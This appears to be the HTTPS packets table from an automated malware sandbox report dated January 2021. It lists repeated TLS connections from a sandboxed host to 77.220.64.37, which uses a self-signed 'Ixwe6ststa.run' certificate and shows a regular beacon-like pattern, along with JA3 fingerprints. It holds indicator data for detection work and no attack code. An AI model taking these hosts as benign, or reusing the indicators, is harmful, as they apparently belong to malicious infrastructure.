                                                                                                                                                            HTTPS Packets

                                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                            Jan 12, 2021 07:39:44.823704958 CET104.27.153.52443192.168.2.2249165CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed May 20 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Thu May 20 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                            Jan 12, 2021 07:39:50.885082006 CET77.220.64.37443192.168.2.2249166CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:39:55.937339067 CET77.220.64.37443192.168.2.2249171CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:39:57.985172033 CET77.220.64.37443192.168.2.2249175CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:00.063389063 CET77.220.64.37443192.168.2.2249179CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:02.122035027 CET77.220.64.37443192.168.2.2249183CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:04.216496944 CET77.220.64.37443192.168.2.2249187CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:06.290813923 CET77.220.64.37443192.168.2.2249191CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:08.344388962 CET77.220.64.37443192.168.2.2249195CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:11.713543892 CET77.220.64.37443192.168.2.2249199CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:13.772563934 CET77.220.64.37443192.168.2.2249203CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:15.832707882 CET77.220.64.37443192.168.2.2249207CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:18.097915888 CET77.220.64.37443192.168.2.2249212CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:20.146485090 CET77.220.64.37443192.168.2.2249216CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:22.234646082 CET77.220.64.37443192.168.2.2249220CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:24.288883924 CET77.220.64.37443192.168.2.2249224CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:26.363502026 CET77.220.64.37443192.168.2.2249228CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:30.113729954 CET77.220.64.37443192.168.2.2249233CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:32.462321043 CET77.220.64.37443192.168.2.2249238CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:34.535433054 CET77.220.64.37443192.168.2.2249242CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:36.631721020 CET77.220.64.37443192.168.2.2249246CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:38.685161114 CET77.220.64.37443192.168.2.2249250CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:40.730827093 CET77.220.64.37443192.168.2.2249254CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:42.774066925 CET77.220.64.37443192.168.2.2249258CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:44.976768017 CET77.220.64.37443192.168.2.2249262CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:47.942837000 CET77.220.64.37443192.168.2.2249266CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:50.002372980 CET77.220.64.37443192.168.2.2249270CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:52.101597071 CET77.220.64.37443192.168.2.2249274CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:54.177886009 CET77.220.64.37443192.168.2.2249278CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:56.221548080 CET77.220.64.37443192.168.2.2249282CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:40:58.289483070 CET77.220.64.37443192.168.2.2249286CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:00.361535072 CET77.220.64.37443192.168.2.2249290CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:02.555783987 CET77.220.64.37443192.168.2.2249294CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:05.159917116 CET77.220.64.37443192.168.2.2249298CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:07.252962112 CET77.220.64.37443192.168.2.2249302CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:09.305660963 CET77.220.64.37443192.168.2.2249306CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:11.370776892 CET77.220.64.37443192.168.2.2249310CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:13.430650949 CET77.220.64.37443192.168.2.2249314CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:15.507910967 CET77.220.64.37443192.168.2.2249318CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:17.549895048 CET77.220.64.37443192.168.2.2249322CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:19.650753021 CET77.220.64.37443192.168.2.2249326CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:22.122325897 CET77.220.64.37443192.168.2.2249330CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:24.215425014 CET77.220.64.37443192.168.2.2249334CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:26.255388021 CET77.220.64.37443192.168.2.2249338CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:28.283556938 CET77.220.64.37443192.168.2.2249342CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:30.358275890 CET77.220.64.37443192.168.2.2249346CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:32.385092020 CET77.220.64.37443192.168.2.2249350CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:34.450143099 CET77.220.64.37443192.168.2.2249354CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:36.894236088 CET77.220.64.37443192.168.2.2249358CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:39.306799889 CET77.220.64.37443192.168.2.2249362CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:41.457151890 CET77.220.64.37443192.168.2.2249366CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:43.569616079 CET77.220.64.37443192.168.2.2249370CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:45.630964041 CET77.220.64.37443192.168.2.2249374CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:47.679960012 CET77.220.64.37443192.168.2.2249378CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:49.740036011 CET77.220.64.37443192.168.2.2249382CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
